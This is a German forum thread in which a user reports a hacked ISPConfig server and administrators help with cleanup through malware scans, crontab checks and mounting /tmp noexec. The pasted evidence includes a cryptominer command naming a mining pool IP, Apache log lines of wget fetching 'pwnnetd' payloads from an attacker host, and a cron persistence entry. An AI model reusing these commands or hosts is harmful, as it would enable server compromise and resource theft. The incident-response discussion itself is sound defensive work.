ispconfig-server gehackt?

Sigix

Member
Hallo,

ich habe ein großes Problem; ich vermute das mein ISP-Config Server von Dritte übernommen wurde!

Distribution: Debian squeeze (6.0.8)
ISP-Config: 3.0.3.3

Folgendes kann ich beobachten:
in den Prozessen (top) starten sich Dienste mit dem Namen s, vi, k, ....

Wenn sich so ein Dienst startet, hat mein Server 99.98 % Auslastung und ich kann enorm hohe Netzwerkaktivität beobachten;

Hier die Prozesse:
www-data 7842 93.7 0.4 29520 4296 ? S 12:43 75:48 /usr/sbin/acpid www-data 11279 4.6 0.1 41032 1572 ? Ssl 13:21 2:01 m64 -o stratum+tcp://5.254.102.165:3333 -O judge.1:x -B root 13973 0.0 0.0 10452 492 ? Ss 14:04 0:00 vzctl: ttyp0

in den Logs habe ich folgendes gefunden:

[Tue Dec 03 12:10:46 2013] [error] [client 94.102.51.238] --2013-12-03 12:10:46-- (try: 3) http://hecks.ddosdev.com/pwnnetd
[Tue Dec 03 12:10:46 2013] [error] [client 94.102.51.238] Connecting to hecks.ddosdev.com|192.151.144.234|:80...
[Tue Dec 03 12:10:46 2013] [error] [client 94.102.51.238] --2013-12-03 12:10:46-- (try: 3) http://hecks.ddosdev.com/pwnnetd3
[Tue Dec 03 12:10:46 2013] [error] [client 94.102.51.238] Connecting to hecks.ddosdev.com|192.151.144.234|:80...
[Tue Dec 03 12:11:07 2013] [error] [client 94.102.51.238] failed: Connection timed out.
[Tue Dec 03 12:11:07 2013] [error] [client 94.102.51.238] Retrying.
[Tue Dec 03 12:11:07 2013] [error] [client 94.102.51.238]
[Tue Dec 03 12:11:07 2013] [error] [client 94.102.51.238] failed: Connection timed out.
[Tue Dec 03 12:11:07 2013] [error] [client 94.102.51.238] Retrying.
[Tue Dec 03 12:11:07 2013] [error] [client 94.102.51.238]
[Tue Dec 03 12:11:10 2013] [error] [client 94.102.51.238] --2013-12-03 12:11:10-- (try: 4) http://hecks.ddosdev.com/pwnnetd
[Tue Dec 03 12:11:10 2013] [error] [client 94.102.51.238] Connecting to hecks.ddosdev.com|192.151.144.234|:80...
[Tue Dec 03 12:11:10 2013] [error] [client 94.102.51.238] --2013-12-03 12:11:10-- (try: 4) http://hecks.ddosdev.com/pwnnetd3
[Tue Dec 03 12:11:10 2013] [error] [client 94.102.51.238] Connecting to hecks.ddosdev.com|192.151.144.234|:80...
[Tue Dec 03 12:11:19 2013] [error] [client 94.102.51.238] connected.
[Tue Dec 03 12:11:19 2013] [error] [client 94.102.51.238] HTTP request sent, awaiting response...
[Tue Dec 03 12:11:19 2013] [error] [client 94.102.51.238] connected.
[Tue Dec 03 12:11:19 2013] [error] [client 94.102.51.238] HTTP request sent, awaiting response...
[Tue Dec 03 12:11:23 2013] [error] [client 94.102.51.238] 200 OK
[Tue Dec 03 12:11:23 2013] [error] [client 94.102.51.238] Length:
[Tue Dec 03 12:11:23 2013] [error] [client 94.102.51.238] 379680
[Tue Dec 03 12:11:23 2013] [error] [client 94.102.51.238] (371K)
[Tue Dec 03 12:11:23 2013] [error] [client 94.102.51.238]
[Tue Dec 03 12:11:23 2013] [error] [client 94.102.51.238] Saving to: `pwnnetd3.3'
[Tue Dec 03 12:11:23 2013] [error] [client 94.102.51.238]
[Tue Dec 03 12:11:23 2013] [error] [client 94.102.51.238] 0K


rkhunter hat nichts gefunden!

chkrootkit sagt folgendes:
Checking `bindshell'...INFECTED (PORTS: 465)
Searching for suspicious files and dirs, it may take a while... The following suspicious files and directories were found: /usr/lib/pymodules/python2.6/.path /lib/init/rw/.ramfs


Kann mir hierzu wer helfen ????
 

Till

Administrator
Wahrscheinlich wurde "nur" eine Wesebiet gehackt und nicht dein Server übernommen, also der Angreifer ist nicht root. In welchem Log genau stand das?

Der chkrootkit output ist ok und hat nichts zu bedeuten, das bindshell INFECTED ist ein bekannetr false positive.

Nutzt Du in allen webseiten php-fcgi + suexec oder nutzt du mod_php?

Checke Deinen server mal mit maldet:

HowtoForge Forums | HowtoForge - Linux Howtos and Tutorials - View Single Post - Linux Malware Detect on Debian 6 with ISPConfig 3
 

Sigix

Member
Wahrscheinlich wurde "nur" eine Wesebiet gehackt und nicht dein Server übernommen, also der Angreifer ist nicht root. In welchem Log genau stand das?

Der chkrootkit output ist ok und hat nichts zu bedeuten, das bindshell INFECTED ist ein bekannetr false positive.

Nutzt Du in allen webseiten php-fcgi + suexec oder nutzt du mod_php?

Checke Deinen server mal mit maldet:

HowtoForge Forums | HowtoForge - Linux Howtos and Tutorials - View Single Post - Linux Malware Detect on Debian 6 with ISPConfig 3

Das stand im apache-error log!
Ja hab bei allen Seiten SuPHP eingetragen!

ich check mal gleich mit maldet durch!

lg
 

Sigix

Member
Das stand im apache-error log!
Ja hab bei allen Seiten SuPHP eingetragen!

ich check mal gleich mit maldet durch!

lg
Soeben ist wieder ein Prozess gekommen "perl"
18062 www-data 25 0 29520 4292 1424 S 94.9 0.4 6:07.60 perl

Hier der Prozessinhalt:
-r-------- 1 www-data www-data 0 Dec 3 16:42 auxv
-r--r--r-- 1 www-data www-data 0 Dec 3 16:37 cmdline
-rw-r--r-- 1 www-data www-data 0 Dec 3 16:42 coredump_filter
-r--r--r-- 1 www-data www-data 0 Dec 3 16:42 cpuset
lrwxrwxrwx 1 www-data www-data 0 Dec 3 16:42 cwd -> /tmp
-r-------- 1 www-data www-data 0 Dec 3 16:42 environ
lrwxrwxrwx 1 www-data www-data 0 Dec 3 16:37 exe -> /usr/bin/perl
dr-x------ 2 www-data www-data 0 Dec 3 16:42 fd
dr-x------ 2 www-data www-data 0 Dec 3 16:42 fdinfo
-r--r--r-- 1 www-data www-data 0 Dec 3 16:42 io
-r--r--r-- 1 www-data www-data 0 Dec 3 16:42 limits
-rw-r--r-- 1 www-data www-data 0 Dec 3 16:42 loginuid
-r--r--r-- 1 www-data www-data 0 Dec 3 16:42 maps
-rw------- 1 www-data www-data 0 Dec 3 16:42 mem
-r--r--r-- 1 www-data www-data 0 Dec 3 16:42 mounts
-r-------- 1 www-data www-data 0 Dec 3 16:42 mountstats
-r--r--r-- 1 www-data www-data 0 Dec 3 16:42 numa_maps
-rw-r--r-- 1 www-data www-data 0 Dec 3 16:42 oom_adj
-r--r--r-- 1 www-data www-data 0 Dec 3 16:42 oom_score
lrwxrwxrwx 1 www-data www-data 0 Dec 3 16:42 root -> /
-r--r--r-- 1 www-data www-data 0 Dec 3 16:42 schedstat
-r--r--r-- 1 www-data www-data 0 Dec 3 16:42 smaps
-r--r--r-- 1 www-data www-data 0 Dec 3 16:42 stack
-r--r--r-- 1 www-data www-data 0 Dec 3 16:37 stat
-r--r--r-- 1 www-data www-data 0 Dec 3 16:37 statm
-r--r--r-- 1 www-data www-data 0 Dec 3 16:42 status
dr-xr-xr-x 3 www-data www-data 0 Dec 3 16:42 task
-r--r--r-- 1 www-data www-data 0 Dec 3 16:42 wchan

????????
 

Till

Administrator
irgend was in /tmp, wenn Du mit ls -la checkst? Schau Dir mal den Prozess mit lsof näher an.
 

Sigix

Member
irgend was in /tmp, wenn Du mit ls -la checkst? Schau Dir mal den Prozess mit lsof näher an.

es waren 2 Dienste:
perl und sh ....

jetz muss ich warten bis diese wieder kommen damit ich checken kann ob irgendetwas im tmp drinnen ist!

Wenn ich den Dienst "sh" mit pkill beende, verliere ich auch die ssh verbindung zum server und muss diesen komplett neu starten damit ich wieder drauf komme! ??
 

Till

Administrator
Checke mal die crontab vn www-data, ob da was drin steht. die sollte an sich leer sein.

crontab -u www-data -e
 

Sigix

Member
nee ist nicht leer

* * * * * /tmp/update >/dev/null 2>&1

???

maldet ergebnis:
root@mail2:~# /usr/local/maldetect/maldet -a /
Linux Malware Detect v1.4.2
(C) 2002-2013, R-fx Networks <proj@r-fx.org>
(C) 2013, Ryan MacDonald <ryan@r-fx.org>
inotifywait (C) 2007, Rohan McGovern <rohan@mcgovern.id.au>
This program may be freely redistributed under the terms of the GNU GPL v2

maldet(7773): {scan} signatures loaded: 11355 (9483 MD5 / 1872 HEX)
maldet(7773): {scan} building file list for /, this might take awhile...
/usr/bin/find: `/proc/7825/task/7825/fd/5': No such file or directory
/usr/bin/find: `/proc/7825/task/7825/fdinfo/5': No such file or directory
/usr/bin/find: `/proc/7825/fd/5': No such file or directory
/usr/bin/find: `/proc/7825/fdinfo/5': No such file or directory
maldet(7773): {scan} file list completed, found 313210 files...
maldet(7773): {scan} found ClamAV clamscan binary, using as scanner engine...
maldet(7773): {scan} scan of / (313210 files) in progress...
maldet(7773): {scan} processing scan results for hits: 144 hits 0 cleaned
maldet(7773): {scan} scan completed on /: files 313210, malware hits 144, cleaned hits 0
maldet(7773): {scan} scan report saved, to view run: maldet --report 120313-1651.7773
maldet(7773): {scan} quarantine is disabled! set quar_hits=1 in conf.maldet or to quarantine results run: maldet -q 120313-1651.7773



{HEX}gzbase64.inject.unclassed.14 : /usr/src/maldetect-1.4.2/files/clean/gzbase64.inject.unclassed
{CAV}Heuristics.Phishing.Email.SpoofedDomain : /var/vmail/example.co.at/office/new/1353518993.M529823P10071V0000000000009039I000000000554C522_0.mail2.sx-it.com,S=5153
{CAV}Heuristics.Phishing.Email.SpoofedDomain : /var/lib/amavis/virusmails/H/virus-HhANJdyVkNFz
{CAV}Heuristics.Phishing.Email.SpoofedDomain : /var/lib/amavis/virusmails/H/virus-H-3hD0hxiyjc
{CAV}Heuristics.Phishing.Email.SSL-Spoof : /var/lib/amavis/virusmails/5/virus-5bMONeQH3J0V
{CAV}Heuristics.Phishing.Email.SpoofedDomain : /var/lib/amavis/virusmails/W/virus-W3xAq6vLcGin
{CAV}Heuristics.Phishing.Email.SSL-Spoof : /var/lib/amavis/virusmails/W/virus-WhhYsuCaTGRb
{CAV}Heuristics.Phishing.Email.SpoofedDomain : /var/lib/amavis/virusmails/W/virus-WgbnyI5wMO-x
{CAV}Heuristics.Phishing.Email.SSL-Spoof : /var/lib/amavis/virusmails/W/virus-WatxDP2jsxul
{CAV}Heuristics.Phishing.Email.SpoofedDomain : /var/lib/amavis/virusmails/W/virus-WQBMGH40ei1K
{CAV}Heuristics.Phishing.Email.SpoofedDomain : /var/lib/amavis/virusmails/W/virus-Wa-YxnvnOoAR
{CAV}Heuristics.Phishing.Email.SpoofedDomain : /var/lib/amavis/virusmails/W/virus-WY4ecV4HgR9S
{CAV}Heuristics.Phishing.Email.SSL-Spoof : /var/lib/amavis/virusmails/0/virus-07mUDlqKTh7d
{CAV}Heuristics.Phishing.Email.SpoofedDomain : /var/lib/amavis/virusmails/0/virus-0D-xoFHEEeHr
{CAV}Heuristics.Phishing.Email.SpoofedDomain : /var/lib/amavis/virusmails/0/virus-0uNZSEUnl6yB
{CAV}Heuristics.Phishing.Email.SpoofedDomain : /var/lib/amavis/virusmails/0/virus-0jTdAMFBH6ZA
{CAV}Heuristics.Phishing.Email.SpoofedDomain : /var/lib/amavis/virusmails/0/virus-0-8XLgTxenhh
{CAV}Heuristics.Phishing.Email.SpoofedDomain : /var/lib/amavis/virusmails/0/virus-0Ozlyvl9297V
{CAV}Heuristics.Phishing.Email.SpoofedDomain : /var/lib/amavis/virusmails/B/virus-BQJWgVDASc7f
{CAV}Heuristics.Phishing.Email.SpoofedDomain : /var/lib/amavis/virusmails/B/virus-BqFMsAahPAeK
{CAV}Heuristics.Phishing.Email.SpoofedDomain : /var/lib/amavis/virusmails/t/virus-tfUucyh03MUf
{CAV}Heuristics.Phishing.Email.SpoofedDomain : /var/lib/amavis/virusmails/t/virus-txvWjB8iDueE
{CAV}Heuristics.Phishing.Email.SpoofedDomain : /var/lib/amavis/virusmails/m/virus-mBtqEBkMfjK4
{CAV}Heuristics.Phishing.Email.SpoofedDomain : /var/lib/amavis/virusmails/m/virus-mI8J+yUziQmn
{CAV}Heuristics.Phishing.Email.SSL-Spoof : /var/lib/amavis/virusmails/v/virus-vol4n8hgET-1
{CAV}Heuristics.Phishing.Email.SpoofedDomain : /var/lib/amavis/virusmails/E/virus-E3jCJxQ6azO0
{CAV}Heuristics.Phishing.Email.SpoofedDomain : /var/lib/amavis/virusmails/M/virus-MqIQa+xd-Y4V
{CAV}Heuristics.Phishing.Email.SpoofedDomain : /var/lib/amavis/virusmails/M/virus-M5U6l0bxz-D3
{CAV}Heuristics.Phishing.Email.SpoofedDomain : /var/lib/amavis/virusmails/6/virus-6WTDg2RMiaXa
{CAV}Heuristics.Phishing.Email.SpoofedDomain : /var/lib/amavis/virusmails/n/virus-n9HpveH1a19G
{CAV}Heuristics.Phishing.Email.SpoofedDomain : /var/lib/amavis/virusmails/n/virus-nDmYskDzn2Up
{CAV}Heuristics.Phishing.Email.SSL-Spoof : /var/lib/amavis/virusmails/n/virus-nAAexjCI1s4F
{CAV}Heuristics.Phishing.Email.SpoofedDomain : /var/lib/amavis/virusmails/k/virus-kbRCzTIVQBhg
{CAV}Heuristics.Phishing.Email.SpoofedDomain : /var/lib/amavis/virusmails/k/virus-kafFQ6neduSg
{CAV}Heuristics.Phishing.Email.SpoofedDomain : /var/lib/amavis/virusmails/k/virus-ksaCY3gD1V7I
{CAV}Heuristics.Phishing.Email.SpoofedDomain : /var/lib/amavis/virusmails/k/virus-kAnIOeyLWRl8
{CAV}Heuristics.Phishing.Email.SpoofedDomain : /var/lib/amavis/virusmails/k/virus-krsT42hN+a6n
{CAV}Heuristics.Phishing.Email.SpoofedDomain : /var/lib/amavis/virusmails/z/virus-zyfCY+9uV8uq
{CAV}Heuristics.Phishing.Email.SpoofedDomain : /var/lib/amavis/virusmails/z/virus-zMKRbim8i8Rr
{CAV}Heuristics.Phishing.Email.SpoofedDomain : /var/lib/amavis/virusmails/z/virus-z6SWUqt5cM+L
{CAV}Heuristics.Phishing.Email.SpoofedDomain : /var/lib/amavis/virusmails/g/virus-gth6xx4M5-Bj
{CAV}Heuristics.Phishing.Email.SpoofedDomain : /var/lib/amavis/virusmails/4/virus-4mPlwlS-pDlb
{CAV}Heuristics.Phishing.Email.SpoofedDomain : /var/lib/amavis/virusmails/4/virus-4zMgKyf4buAi
{CAV}Heuristics.Phishing.Email.SpoofedDomain : /var/lib/amavis/virusmails/4/virus-4KSs5uYxhoYx
{CAV}Heuristics.Phishing.Email.SpoofedDomain : /var/lib/amavis/virusmails/h/virus-hNzYkvC8AErF
{CAV}Heuristics.Phishing.Email.SSL-Spoof : /var/lib/amavis/virusmails/h/virus-hX5v5Cs4cnwc
{CAV}Heuristics.Phishing.Email.SpoofedDomain : /var/lib/amavis/virusmails/h/virus-hgJFFcXsDNld
{CAV}Heuristics.Phishing.Email.SpoofedDomain : /var/lib/amavis/virusmails/h/virus-hkfykmkpE2Ht
{CAV}Heuristics.Phishing.Email.SpoofedDomain : /var/lib/amavis/virusmails/1/virus-1w3Y5vYp4mAJ
{CAV}Heuristics.Phishing.Email.SpoofedDomain : /var/lib/amavis/virusmails/1/virus-1LdNcAkkDdHi
{CAV}Heuristics.Phishing.Email.SpoofedDomain : /var/lib/amavis/virusmails/1/virus-1qx1NyYtQD-w
{CAV}Heuristics.Phishing.Email.SpoofedDomain : /var/lib/amavis/virusmails/1/virus-19p9EUTFyKtP
 

Sigix

Member
So die Dienste sind wieder da ....

hier lsof des Dienstes

pwnnetd 17846 www-data cwd DIR 0,43 475136 214040585 /tmp
pwnnetd 17846 www-data rtd DIR 0,43 4096 213992283 /
pwnnetd 17846 www-data txt REG 0,43 592464 214041280 /tmp/pwnnetd
pwnnetd 17846 www-data mem REG 0,43 128744 214041320 /lib/ld-2.11.3.so
pwnnetd 17846 www-data mem REG 0,43 31744 214041325 /lib/librt-2.11.3.so
pwnnetd 17846 www-data mem REG 0,43 131258 214041317 /lib/libpthread-2.11.3.so
pwnnetd 17846 www-data mem REG 0,43 1437064 214041464 /lib/libc-2.11.3.so
pwnnetd 17846 www-data mem REG 0,43 51728 214041275 /lib/libnss_files-2.11.3.so
pwnnetd 17846 www-data mem REG 0,43 22928 214041602 /lib/libnss_dns-2.11.3.so
pwnnetd 17846 www-data mem REG 0,43 80712 214041277 /lib/libresolv-2.11.3.so
pwnnetd 17846 www-data 0r CHR 1,3 0t0 214028481 /dev/null
pwnnetd 17846 www-data 1w FIFO 0,6 0t0 1695036699 pipe
pwnnetd 17846 www-data 2w FIFO 0,6 0t0 1695036133 pipe
pwnnetd 17846 www-data 3r REG 0,43 8385936 214024391 /usr/lib/cgi-bin/php5

was soll ich da machen ???? Der Dienst ist 4 mal da!!
 

Sigix

Member
lsof vom Dienst "s"

root@mail2:/# lsof | grep 24484
s 24484 www-data cwd DIR 0,43 4096 219037713 /tmp/.,
s 24484 www-data rtd DIR 0,43 4096 213992283 /
s 24484 www-data txt REG 0,43 7360 213991580 /usr/bin/perl
s 24484 www-data mem REG 0,43 128744 214041320 /lib/ld-2.11.3.so
s 24484 www-data mem REG 0,43 1495784 214036835 /usr/lib/libperl.so.5.10.1
s 24484 www-data mem REG 0,43 14696 214041622 /lib/libdl-2.11.3.so
s 24484 www-data mem REG 0,43 530736 214041631 /lib/libm-2.11.3.so
s 24484 www-data mem REG 0,43 131258 214041317 /lib/libpthread-2.11.3.so
s 24484 www-data mem REG 0,43 1437064 214041464 /lib/libc-2.11.3.so
s 24484 www-data mem REG 0,43 35104 214041574 /lib/libcrypt-2.11.3.so
s 24484 www-data mem REG 0,43 19920 214036796 /usr/lib/perl/5.10.1/auto/IO/IO.so
s 24484 www-data mem REG 0,43 25976 214036798 /usr/lib/perl/5.10.1/auto/Socket/Socket.so
s 24484 www-data mem REG 0,43 51728 214041275 /lib/libnss_files-2.11.3.so
s 24484 www-data mem REG 0,43 22928 214041602 /lib/libnss_dns-2.11.3.so
s 24484 www-data mem REG 0,43 80712 214041277 /lib/libresolv-2.11.3.so
s 24484 www-data 0r FIFO 0,6 0t0 1699083772 pipe
s 24484 www-data 1w FIFO 0,6 0t0 1699083786 pipe
s 24484 www-data 2w FIFO 0,6 0t0 1699083774 pipe
s 24484 www-data 3r REG 0,43 8385936 214024391 /usr/lib/cgi-bin/php5
s 24484 www-data 4u IPv4 1699117251 0t0 TCP mail2.sx-it.com:41104->ipbrick.cades.fr:6670 (ESTABLISHED)
s 24484 www-data 78r FIFO 0,6 0t0 1690944073 pipe
s 24484 www-data 79w FIFO 0,6 0t0 1690944073 pipe
s 24484 www-data 80r FIFO 0,6 0t0 1690944074 pipe
s 24484 www-data 81w FIFO 0,6 0t0 1690944074 pipe


in dem Ordner "/tmp/.," ist folgendes vorhanden:
-rwxr-xr-x 1 www-data www-data 74 Feb 24 2009 .u
-rwxr-xr-x 1 www-data www-data 319 Feb 22 2009 autorun
-rw-r--r-- 1 www-data www-data 41 Dec 3 18:52 cron.d
-rwxr-xr-x 1 www-data www-data 152108 Jun 1 2001 crond
-rwxr-xr-x 1 www-data www-data 8687 Jan 24 2006 f
-rwxr-xr-x 1 www-data www-data 14679 Nov 3 2005 f4
-rw-r--r-- 1 www-data www-data 8 Dec 3 18:52 fl.dir
-rwxr-xr-x 1 www-data www-data 81 Aug 17 2006 fwd
-rwxr-xr-x 1 www-data www-data 10848 May 29 2005 j
-rwxr-xr-x 1 www-data www-data 13850 May 29 2005 j2
-rwxr-xr-x 1 www-data www-data 22983 Jul 30 2004 mech.help
-rwxr-xr-x 1 www-data www-data 446 Dec 1 17:22 mech.set
-rwxr-xr-x 1 www-data www-data 18 Dec 3 18:49 run
-rwxr-xr-x 1 www-data www-data 15078 Feb 20 2005 s
-rwxr-xr-x 1 www-data www-data 13089 Dec 1 17:01 shit
-rwxr-xr-x 1 www-data www-data 16776 Sep 19 2002 sl
-rwxr-xr-x 1 www-data www-data 39 Dec 1 20:51 start.sh
-rwxr-xr-x 1 www-data www-data 15195 Sep 2 2004 std
-rwxr-xr-x 1 www-data www-data 8790 Jan 24 2006 stream
-rwxr-xr-x 1 www-data www-data 7091 Jan 24 2006 tty
-rwxr--r-- 1 www-data www-data 157 Dec 3 18:52 update
-rwxr-xr-x 1 www-data www-data 13687 Nov 20 2002 v
-rwxr-xr-x 1 www-data www-data 14841 Jul 22 2005 v2
-rwxr-xr-x 1 www-data www-data 915 Mar 2 2005 x


Was kann ich machen damit mein Server wieder clean wird ???
 

F4RR3LL

Active Member
Also suphp und owner www-data passt aber nicht zusammen.
Irgendwas muss bei dir mit www-data laufen. Roundcube o.ä. installiert und mit modphp laufen?
Ist /tmp bei dir eine extra partition? Falls ja, mounte sie mit noexec.
Die Seite(n) mit modphp offline nehmen und schaun welche Version des CMS oder wasauchimmer dort installiert ist rennt, ggf neu installieren in der aktuellen Version und Backup von Hand einspielen damit du nicht die Lücke gleich wieder einspeist.

Gruß Sven

Für Openvz gehts mit noexec so: http://www.stronghub.com/securing-tmp-and-vartmp-on-openvz-container/
 
Zuletzt bearbeitet:

Sigix

Member
Hi, danke für deine Antwort,...

ich habe diesen Server nach dem howtoForge - Perfect Debian Server installiert (vor ca. 2 oder 3 Jahren) ..... das einzige was hier läuft ist das Webmail und phpmyadmin

sonst nichts.....

Nein mein Filesystem sieht folgendermassen aus:

Filesystem Size Used Avail Use% Mounted on
/dev/vzfs 50G 17G 34G 34% /
tmpfs 512M 0 512M 0% /lib/init/rw
tmpfs 512M 0 512M 0% /dev/shm

also kein eigener Mount-punkt!

ich habe jetzt alle Seiten durchgesehen bei allen ist SuPHP ausgewählt!
?????????
 

F4RR3LL

Active Member
Wie werden roundcube und phpmyadmin aufgerufen, wann wurden sie das letzte mal aktualisiert?

mount -t tmpfs -o noexec,nosuid,size=2G tmpfs /tmp/
mount -t tmpfs -o noexec,nosuid,size=2G tmpfs /var/tmp/

^^so bekommste tmp erstmal auf noexec
 
Zuletzt bearbeitet:

Sigix

Member
Wie werden roundcube und phpmyadmin aufgerufen, wann wurden sie das letzte mal aktualisiert?

mount -t tmpfs -o noexec,nosuid tmpfs /tmp/
mount -t tmpfs -o noexec,nosuid tmpfs /var/tmp/

^^so bekommste tmp erstmal auf noexec
okay

/dev/vzfs 50G 17G 34G 34% /
tmpfs 512M 0 512M 0% /lib/init/rw
tmpfs 512M 0 512M 0% /dev/shm
tmpfs 512M 44K 512M 1% /tmp
tmpfs 512M 0 512M 0% /var/tmp

sind gemountet

ich habe squirrelmail (Version 1.4.21)
phpmyadmin ist noch uralt.... 3.3.7deb7

phpmyadmin kann ich aktualisieren!
squirrelmail auf Version 1.4.22 ???
 

Till

Administrator
ich habe squirrelmail (Version 1.4.21)
phpmyadmin ist noch uralt.... 3.3.7deb7

phpmyadmin kann ich aktualisieren!
squirrelmail auf Version 1.4.22 ???

das uralt in der Versionsnummer hat nichts zu sagen, Debian patch Sicherheitslücken ohne die Versionsnummer der Software zu erhöhen, erkennbar am Zusatz deb7, ist also der 7. patch. Debian 6 ist noch unterstützt, also ist Dein System sicher solange Du alle aktuellen Debian Updates mit:

apt-get update
apt-get upgrade

installiert hast.
 

Till

Administrator
Du solltest auch überlegen mal ISPConfig zu aktualisieren. Mir ist zwar keine Sicherheitslücke in ISPConfig bekannt die dafür verantwortlich sein könnte, aber es ist nie gut alte Versionen einzusetzen, außer Du hast einen Bestimmten Grund wie z.B. größere eigene Codeanpassungen, dass du nicht updaten kannst. Und in den aktuellen ISPConfig Versionen läuft das ispconfig interface auch per fcgi php unter dem user ispconfig und nicht mehr mit mod_php, so dass wir dann einen weiteren Dienst der unter www-data läuft ausschließen können.
 

Till

Administrator
Und poste mal die ausgabe von:

/usr/lib/cgi-bin/php5 -v

bevor Du debian oder ispconfig updatest.
 

F4RR3LL

Active Member
Laut Debian -- Ergebnisse der Debian-Paketsuche -- squeeze sind deine beiden eingesetzten Versionen aktuell. Hm, schwierig. Es muss auf jeden fall etwas sein das unter modphp läuft/lief und dort war/ist die Lücke.
Zumindest bist du nun mit dem auf diese Art eingebundenen tmp Verzeichnis davor geschützt, dass aus tmp heraus etwas "unkoscheres" von dort gestartet wird. Die laufenden Prozesse hast Du hoffe ich gekickt. Und nicht vergessen das ganze rebootfest zu machen mit einem Eintrag in der /etc/fstab.

Gruß Sven
 

Sigix

Member

Werbung

Top